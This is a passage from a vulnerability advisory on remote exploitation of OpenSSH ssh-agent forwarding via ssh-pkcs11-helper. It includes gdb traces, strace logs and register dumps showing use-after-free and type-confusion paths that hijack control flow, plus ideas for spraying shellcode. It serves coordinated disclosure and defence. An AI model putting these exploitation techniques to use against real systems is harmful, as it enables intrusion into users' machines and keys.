0x00007f9ae7d82df4: call 0x7f9ae7d70180 66255 0x00007f9ae7d70180 : endbr64 66256 0x00007f9ae7d70184 : bnd jmp *0x7aa9d(%rip) # 0x7f9ae7deac28 66257 0x00007f9af801bbe0 : endbr64 66258 0x00007f9af801bbe4 : push %r12 66259 0x00007f9af801bbe6 : push %rbx 66260 0x00007f9af801bbe7 : lea 0x3f(%rdi),%ebx 66261 0x00007f9af801bbea : mov $0x18,%edi 66262 0x00007f9af801bbef : shr $0x6,%ebx 66263 0x00007f9af801bbf2 : sub $0x8,%rsp 66264 0x00007f9af801bbf6 : call 0x7f9af801bb40 66265 0x00007f9af801bb40: endbr64 ... 66285 0x00007f9af809cc60: mov 0xa8311(%rip),%rax # 0x7f9af8144f78 66286 0x00007f9af809cc67: test %rax,%rax 66287 0x00007f9af809cc6a: jne 0x7f9af809cc44 66288 0x00007f9af809cc44: call *%rax 66289 0x00007f9afc27edc0: cmp %eax,%ebx 66290 0x00007f9afc27edc2: jne 0x7f9afc27f150 66291 0x00007f9afc27f150: mov %r14,%rsi 66292 0x00007f9afc27f153: mov %r13,%rdi 66293 0x00007f9afc27f156: call *%rbx ------------------------------------------------------------------------ In the following example, the unmapped callback function is called at line 87352, the replacement code (gadget) is executed instead at line 87353, and jumps to the stack at line 87354: Attaching to program: /usr/lib/openssh/ssh-pkcs11-helper, process 3628993 ... (gdb) record btrace (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007ffe4fc16d10 in ?? () (gdb) !grep stack /proc/3628993/maps 7ffe4fbfc000-7ffe4fc1d000 rw-p 00000000 00:00 0 [stack] (gdb) set record instruction-history-size 100 (gdb) record instruction-history ... 87347 0x00007f35f8972d26 <_ZN7QObjectC2ER14QObjectPrivatePS_+182>: lea 0x26acd3(%rip),%rax # 0x7f35f8bdda00 87348 0x00007f35f8972d2d <_ZN7QObjectC2ER14QObjectPrivatePS_+189>: mov 0x18(%rax),%rax 87349 0x00007f35f8972d31 <_ZN7QObjectC2ER14QObjectPrivatePS_+193>: test %rax,%rax 87350 0x00007f35f8972d34 <_ZN7QObjectC2ER14QObjectPrivatePS_+196>: jne 0x7f35f8972d88 <_ZN7QObjectC2ER14QObjectPrivatePS_+280> 87351 0x00007f35f8972d88 <_ZN7QObjectC2ER14QObjectPrivatePS_+280>: mov %rbx,%rdi 87352 0x00007f35f8972d8b <_ZN7QObjectC2ER14QObjectPrivatePS_+283>: call *%rax 87353 0x00007f35fa445130 <_ZN5KAuth15ObjectDecorator13setAuthActionERKNS_6ActionE+80>: pop %rbp 87354 0x00007f35fa445131 <_ZN5KAuth15ObjectDecorator13setAuthActionERKNS_6ActionE+81>: ret ------------------------------------------------------------------------ Note: several shared libraries that are installed by default on Ubuntu Desktop (for example, gkm-*-store-standalone.so) do not have constructor or destructor functions, but they are actual PKCS#11 providers, so some of their functions are explicitly called by ssh-pkcs11-helper, and these functions register a callback function with libgcrypt.so but they do not deregister it when dlclose()d (i.e., when munmap()ed), thus exhibiting the "Callback function use-after-free" behavior presented in this subsection. In the following example, one of libgcrypt.so's functions is called at line 79114, the unmapped callback function is called at line 79143, the replacement code (gadget) is executed instead at line 79144, and jumps to the stack at line 79157: Attaching to program: /usr/lib/openssh/ssh-pkcs11-helper, process 3629085 ... (gdb) record btrace (gdb) continue Continuing. Thread 1 "ssh-pkcs11-help" received signal SIGSEGV, Segmentation fault. 0x00007fffb2735c48 in ?? () (gdb) !grep stack /proc/3629085/maps 7fffb2716000-7fffb2737000 rw-p 00000000 00:00 0 [stack] (gdb) set record instruction-history-size 100 (gdb) record instruction-history ... 79114 0x00007f8328147e3a: call 0x7f8328135500 79115 0x00007f8328135500 : endbr64 79116 0x00007f8328135504 : bnd jmp *0x7a8dd(%rip) # 0x7f83281afde8 79117 0x00007f832e2b1220 : endbr64 79118 0x00007f832e2b1224 : sub $0x8,%rsp 79119 0x00007f832e2b1228 : call 0x7f832e32fbb0 79120 0x00007f832e32fbb0: endbr64 ... 79140 0x00007f832e2b436e: mov 0x129dc3(%rip),%rax # 0x7f832e3de138 79141 0x00007f832e2b4375: test %rax,%rax 79142 0x00007f832e2b4378: je 0x7f832e2b43b0 79143 0x00007f832e2b437a: jmp *%rax 79144 0x00007f832ed274f0: and $0x20,%al 79145 0x00007f832ed274f2: mov %rax,0x50(%rsp) 79146 0x00007f832ed274f7: mov 0x30(%rsp),%r13d 79147 0x00007f832ed274fc: mov 0x58(%rsp),%r15 79148 0x00007f832ed27501: mov %ebx,%ebp 79149 0x00007f832ed27503: mov %r8d,%edx 79150 0x00007f832ed27506: mov 0x50(%rsp),%rsi 79151 0x00007f832ed2750b: mov 0x28(%rsp),%r14 79152 0x00007f832ed27510: movslq 0x38(%r12),%rax 79153 0x00007f832ed27515: sub $0x8000,%ebp 79154 0x00007f832ed2751b: mov 0x54(%r12),%ecx 79155 0x00007f832ed27520: add %rax,%r14 79156 0x00007f832ed27523: mov %r14,%rdi 79157 0x00007f832ed27526: call *%r15 ======================================================================== Return from syscall use-after-free ======================================================================== While analyzing the strace logs of the dlopen() and dlclose() of every shared library in /usr/lib*, we spotted an unusual SIGSEGV: - a shared library is loaded, and its constructor function starts a thread that sleeps for 10 seconds in kernel-land: ------------------------------------------------------------------------ 3631347 openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/cmpi/libcmpiOSBase_ProcessorProvider.so", O_RDONLY|O_CLOEXEC) = 3 ... 3631347 mmap(NULL, 33296, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f5f3c3fb000 3631347 mmap(0x7f5f3c3fd000, 12288, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f5f3c3fd000 3631347 mmap(0x7f5f3c400000, 8192, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x5000) = 0x7f5f3c400000 3631347 mmap(0x7f5f3c402000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f5f3c402000 3631347 close(3) = 0 ... 3631347 clone3({flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, child_tid=0x7f5f3bd70910, parent_tid=0x7f5f3bd70910, exit_signal=0, stack=0x7f5f3b570000, stack_size=0x7fff00, tls=0x7f5f3bd70640} => {parent_tid=[3631372]}, 88) = 3631372 ... 3631372 clock_nanosleep(CLOCK_REALTIME, 0, {tv_sec=10, tv_nsec=0}, ------------------------------------------------------------------------ - meanwhile, the main thread (ssh-pkcs11-helper) unloads this shared library (because it is not an actual PKCS#11 provider) and therefore munmap()s the code where the sleeping thread should return to after its sleep in kernel-land: ------------------------------------------------------------------------ 3631347 socket(AF_UNIX, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 3 3631347 connect(3, {sa_family=AF_UNIX, sun_path="/dev/log"}, 110) = 0 3631347 sendto(3, "<35>Jun 22 18:35:25 ssh-pkcs11-helper[3631347]: error: dlsym(C_GetFunctionList) failed: /usr/lib/x86_64-linux-gnu/cmpi/libcmpiOSBase_ProcessorProvider.so: undefined symbol: C_GetFunctionList", 190, MSG_NOSIGNAL, NULL, 0) = 190 3631347 close(3) = 0 3631347 munmap(0x7f5f3c3fb000, 33296) = 0 ------------------------------------------------------------------------ - the sleeping thread returns from kernel-land and crashes with a SIGSEGV because its userland code (at 0x7f5f3c3fecff) was unmapped: ------------------------------------------------------------------------ 3631372 <... clock_nanosleep resumed>0x7f5f3bd6fde0) = 0 3631372 --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x7f5f3c3fecff} --- ------------------------------------------------------------------------ Of course, we can request ssh-pkcs11-helper to load (mmap()) a "nodelete" library before the sleeping thread returns from kernel-land, thus replacing the unmapped userland code with another piece of code (a hopefully useful gadget). In the following example, the sleeping thread returns from kernel-land after line 214, executes the replacement code (gadget) at line 256, and jumps to the stack at line 1305: Attaching to program: /usr/lib/openssh/ssh-pkcs11-helper, process 3631531 ... (gdb) record btrace (gdb) continue Continuing. ... Thread 2 "ssh-pkcs11-help" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7f4603960640 (LWP 3631561)] 0x00007ffe2196f180 in ?? () (gdb) !grep stack /proc/3631531/maps 7ffe21955000-7ffe21976000 rw-p 00000000 00:00 0 [stack] (gdb) set record instruction-history-size unlimited (gdb) record instruction-history ... 214 0x00007f4604b71866 <__GI___clock_nanosleep+198>: syscall ... 240 0x00007f4604b71831 <__GI___clock_nanosleep+145>: ret ... 244 0x00007f4604b766ef <__GI___nanosleep+31>: ret ... 255 0x00007f4604b7663d <__sleep+93>: ret 256 0x00007f46050fecff: jmp 0x7f4604662e54 <__ieee754_j1f128+2276> 257 0x00007f4604662e54 <__ieee754_j1f128+2276>: movq 0x60(%rsp),%mm3 ... 1304 0x00007f460466285b <__ieee754_j1f128+747>: add $0xc8,%rsp 1305 0x00007f4604662862 <__ieee754_j1f128+754>: ret ======================================================================== Sigaltstack use-after-free ======================================================================== From time to time, we noticed the following warning in the dmesg of our fuzzing laptop: ------------------------------------------------------------------------ [585902.691238] signal: ssh-pkcs11-help[1663008] overflowed sigaltstack ------------------------------------------------------------------------ On investigation, we discovered that at least one shared library (libgnatcoll_postgres.so) calls sigaltstack() to register an alternate signal stack (used by SA_ONSTACK signal handlers) when dlopen()ed, and then munmap()s this signal stack without deregistering it (SS_DISABLE) when dlclose()d. Consequently, we implemented and tested a different attack idea: - we randomly load zero or more shared libraries that permanently alter the mmap layout; - we load libgnatcoll_postgres.so, which registers an alternate signal stack and then munmap()s it without deregistering it; - we randomly load zero or more shared libraries that alter the mmap layout (again), and hopefully replace the unmapped signal stack with another writable memory mapping (for example, a thread stack, or a .data or .bss segment); - we randomly load one shared library that registers an SA_ONSTACK signal handler but does not munmap() its code when dlclose()d (unlike our original "Signal handler use-after-free" attack); - we randomly load one shared library that raises this signal and therefore calls the SA_ONSTACK signal handler, thus overwriting the replacement memory mapping with stack frames from the signal handler; - we randomly load one or more shared libraries that hopefully use the overwritten contents of the replacement memory mapping. Although we successfully found various combinations of shared libraries that overwrite a .data or .bss segment with a stack frame from a signal handler, we failed to overwrite a useful memory mapping with useful data (e.g., we failed to magically jump to the stack); for this attack to work, more research and a finer-grained approach might be required. ======================================================================== Sigreturn to arbitrary instruction pointer ======================================================================== Astonishingly, numerous combinations of shared libraries crash because they try to execute code at 0xcccccccccccccccc: a direct control of the instruction pointer (RIP), because these 0xcc bytes come from the stack buffer of ssh-pkcs11-helper that we (remote attackers) filled with 0xcc bytes. Initially, we got very excited by this new attack vector, because we thought that a gadget of the form "add rsp, N; ret" was executed, thus moving the stack pointer (RSP) into our 0xcc-filled stack buffer and popping RIP from there. Unfortunately, the reality is more complex: - a shared library raises a signal (a SIGSEGV in the example below, at line 134110) and, in consequence of a "Signal handler use-after-free", a replacement gadget of the form "ret N" is executed instead of the signal handler (at line 134111); - exactly as the real signal handler would, the replacement gadget returns to the glibc's restore_rt() function (at line 134112), which in turn calls the kernel's rt_sigreturn() function (at line 134113); - however, before the kernel's rt_sigreturn() function is called, the replacement gadget "ret N" moves RSP into our 0xcc-filled stack buffer and as a result, the kernel's rt_sigreturn() function restores all userland registers (including RIP and RSP) from there; ------------------------------------------------------------------------ Attaching to program: /usr/lib/openssh/ssh-pkcs11-helper, process 3633914 ... (gdb) record btrace (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007fcd468671b1 in xtables_register_target () from /lib/x86_64-linux-gnu/libxtables.so.12 (gdb) x/i 0x00007fcd468671b1 => 0x7fcd468671b1 : movzbl 0x18(%rax),%eax (gdb) info registers rax 0x0 0 ... (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0xcccccccccccccccc in ?? () (gdb) set record instruction-history-size 100 (gdb) record instruction-history ... 134106 0x00007fcd4686719e : mov 0x6e1b(%rip),%rax # 0x7fcd4686dfc0 134107 0x00007fcd468671a5 : movzwl 0x22(%rbx),%edx 134108 0x00007fcd468671a9 : mov (%rax),%rax 134109 0x00007fcd468671ac : mov %dx,0x6(%rsp) 134110 [disabled] 134111 0x00007fcd48e434a0: ret $0x1f0f 134112 0x00007fcd49655520 <__restore_rt+0>: mov $0xf,%rax 134113 0x00007fcd49655527 <__restore_rt+7>: syscall (gdb) info registers rax 0x0 0 rbx 0xcccccccccccccccc -3689348814741910324 rcx 0xcccccccccccccccc -3689348814741910324 rdx 0xcccccccccccccccc -3689348814741910324 rsi 0xcccccccccccccccc -3689348814741910324 rdi 0xcccccccccccccccc -3689348814741910324 rbp 0xcccccccccccccccc 0xcccccccccccccccc rsp 0xcccccccccccccccc 0xcccccccccccccccc r8 0xcccccccccccccccc -3689348814741910324 r9 0xcccccccccccccccc -3689348814741910324 r10 0xcccccccccccccccc -3689348814741910324 r11 0xcccccccccccccccc -3689348814741910324 r12 0xcccccccccccccccc -3689348814741910324 r13 0xcccccccccccccccc -3689348814741910324 r14 0xcccccccccccccccc -3689348814741910324 r15 0xcccccccccccccccc -3689348814741910324 rip 0xcccccccccccccccc 0xcccccccccccccccc ------------------------------------------------------------------------ Although we directly control all of the userland registers, we failed to transform this attack vector into a one-shot remote exploit, because RSP (which was conveniently pointing into our 0xcc-filled stack buffer) gets overwritten, and because we were unable to leak any information from ssh-pkcs11-helper (to defeat ASLR). Partially overwriting a pointer that is left over in ssh-pkcs11-helper's stack buffer, and that is later used by rt_sigreturn() to restore a userland register, might be an interesting idea that we have not explored yet. ======================================================================== _Unwind_Context type-confusion ======================================================================== This attack vector was the most puzzling of our discoveries: from time to time, some combinations of shared libraries jumped to the stack, but evidently not as a result of a signal handler, callback function, or return from syscall use-after-free. Eventually, we determined the sequence of events that led to these stack jumps: - some shared libraries load LLVM's libunwind.so as a "nodelete" library (i.e., it is never unloaded, even after dlclose()); - some shared libraries throw a C++ exception, which loads GCC's libgcc_s.so and calls the _Unwind_GetCFA() function (at line 57295 in the example below); - however, GCC's libgcc_s.so mistakenly calls LLVM's _Unwind_GetCFA() (at line 57298) instead of GCC's _Unwind_GetCFA() (because LLVM's libunwind.so was loaded first), and passes a pointer to GCC's struct _Unwind_Context to this function (instead of a pointer to LLVM's struct _Unwind_Context, which is a different type of structure); - LLVM's _Unwind_GetCFA() then calls its unw_get_reg() function (at line 57303), which in turn calls a function pointer (at line 57311) that is a member of LLVM's struct _Unwind_Context, but that happens to be a stack pointer in GCC's struct _Unwind_Context; ------------------------------------------------------------------------ Attaching to program: /usr/lib/openssh/ssh-pkcs11-helper, process 3635541 ... (gdb) record btrace (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007ffcf5e9be10 in ?? () (gdb) !grep stack /proc/3635541/maps 7ffcf5e82000-7ffcf5ea3000 rw-p 00000000 00:00 0 [stack] (gdb) set record instruction-history-size 100 (gdb) record instruction-history ... 57295 0x00007f7c8eaaccf1: call 0x7f7c8ea99470 <_Unwind_GetCFA@plt> 57296 0x00007f7c8ea99470 <_Unwind_GetCFA@plt+0>: endbr64 57297 0x00007f7c8ea99474 <_Unwind_GetCFA@plt+4>: bnd jmp *0x1bc2d(%rip) # 0x7f7c8eab50a8 <_Unwind_GetCFA@got.plt> 57298 0x00007f7c8edce920 <_Unwind_GetCFA+0>: sub $0x18,%rsp 57299 0x00007f7c8edce924 <_Unwind_GetCFA+4>: mov %fs:0x28,%rax 57300 0x00007f7c8edce92d <_Unwind_GetCFA+13>: mov %rax,0x10(%rsp) 57301 0x00007f7c8edce932 <_Unwind_GetCFA+18>: lea 0x8(%rsp),%rdx 57302 0x00007f7c8edce937 <_Unwind_GetCFA+23>: mov $0xfffffffe,%esi 57303 0x00007f7c8edce93c <_Unwind_GetCFA+28>: call 0x7f7c8edca6b0 57304 0x00007f7c8edca6b0 : push %rbp 57305 0x00007f7c8edca6b1 : push %r14 57306 0x00007f7c8edca6b3 : push %rbx 57307 0x00007f7c8edca6b4 : mov %rdx,%r14 57308 0x00007f7c8edca6b7 : mov %esi,%ebp 57309 0x00007f7c8edca6b9 : mov %rdi,%rbx 57310 0x00007f7c8edca6bc : mov (%rdi),%rax 57311 0x00007f7c8edca6bf : call *0x10(%rax) (gdb) !grep 7f7c8ea /proc/3635541/maps 7f7c8ea99000-7f7c8eab0000 r-xp 00003000 08:03 8788336 /usr/lib/x86_64-linux-gnu/libgcc_s.so.1 (gdb) !grep 7f7c8ed /proc/3635541/maps 7f7c8edc9000-7f7c8edd1000 r-xp 00000000 08:03 11148811 /usr/lib/llvm-14/lib/libunwind.so.1.0 ------------------------------------------------------------------------ ======================================================================== RCE in library constructor ======================================================================== As a last and extreme example of a remote attack against ssh-agent forwarding, we noticed that one shared library's constructor function (which can be invoked by a remote attacker via an ssh-agent forwarding) starts a server thread that listens on a TCP port, and we discovered a remotely exploitable vulnerability (a heap-based buffer overflow) in this server's implementation. The unusual malloc exploitation technique that we used to remotely exploit this vulnerability is so interesting (it is reliable, one-shot, and works against the latest glibc versions, despite all the modern protections) that we decided to publish it in a separate advisory: https://www.qualys.com/2023/06/06/renderdoc/renderdoc.txt This last and extreme attack vector against ssh-agent also underlines the central point of this advisory: many shared libraries are simply not safe to be loaded (and unloaded) in a security-sensitive program such as ssh-agent. ======================================================================== Discussion ======================================================================== We believe that we have not exploited the full potential of this "dlopen() then dlclose()" primitive: - we have only investigated Ubuntu Desktop 22.04 and 21.10, but other versions, distributions, or operating systems might be hiding further surprises; - our rudimentary fuzzer can certainly be greatly improved, and has definitely not tried all the combinations of shared libraries and side effects; - we have identified seven attack vectors against ssh-agent (described in the "Results" section), but we have not analyzed in detail all the results of our fuzzer; - we have not fully explored various aspects of these attack vectors: - it might be possible to reliably exploit the "Sigaltstack use-after-free" (by carefully overwriting the .data or .bss segment of a shared library) or the "Sigreturn to arbitrary instruction pointer" (by partially overwriting a leftover pointer in ssh-pkcs11-helper's stack); - we currently store our shellcode in ssh-pkcs11-helper's main() stack buffer only, but it might be possible to store shellcode in other stack buffers as well, or somehow spray the stack with shellcode, which would dramatically increase our chances of jumping into our shellcode; for example, we tried to spray the stack with shellcode by interrupting a memcpy() of controlled data with a signal handler, thereby spilling controlled YMM registers to the stack (inspired by https://bugs.chromium.org/p/project-zero/issues/detail?id=2266), but we failed because we can memcpy() only ~10KB of data, and because we cannot remotely use tricks such as inotify or sched*() to precisely time this race; - it might be possible to control the mmap layout of ssh-pkcs11-helper with page precision (which would allow us to precisely control the gadget that replaces the unmapped signal handler, callback function, or return from syscall), but we failed to find large malloc()ations (which are mmap()ed) in ssh-pkcs11-helper (the only way we found to influence the mmap layout is to load and unload shared libraries, as mentioned in Step 4a/ of the "Experiments" section); - instead of replacing the unmapped signal handler or callback function (or return from syscall) with a gadget from another shared library, it is perfectly possible to replace it with an executable thread stack (made executable by loading an "execstack" library), but we have failed so far to control the contents of such a thread stack. ======================================================================== Acknowledgments ======================================================================== We thank the OpenSSH developers, and Damien Miller in particular, for their outstanding work on this vulnerability and on OpenSSH in general. We also thank Mitre's CVE Assignment Team for their quick response. Finally, we dedicate this advisory to the Midnight Fox. ======================================================================== Timeline ======================================================================== 2023-07-06: We sent a draft of our advisory and a preliminary patch to the OpenSSH developers. 2023-07-07: The OpenSSH developers replied and sent us a more complete set of patches. 2023-07-09: We sent feedback about these patches to the OpenSSH developers. 2023-07-11: The OpenSSH developers sent us a complete set of patches, and we sent them feedback about these patches. 2023-07-14: The OpenSSH developers informed us that "we're aiming to make a security-only release ... on July 19th." 2023-07-19: Coordinated release.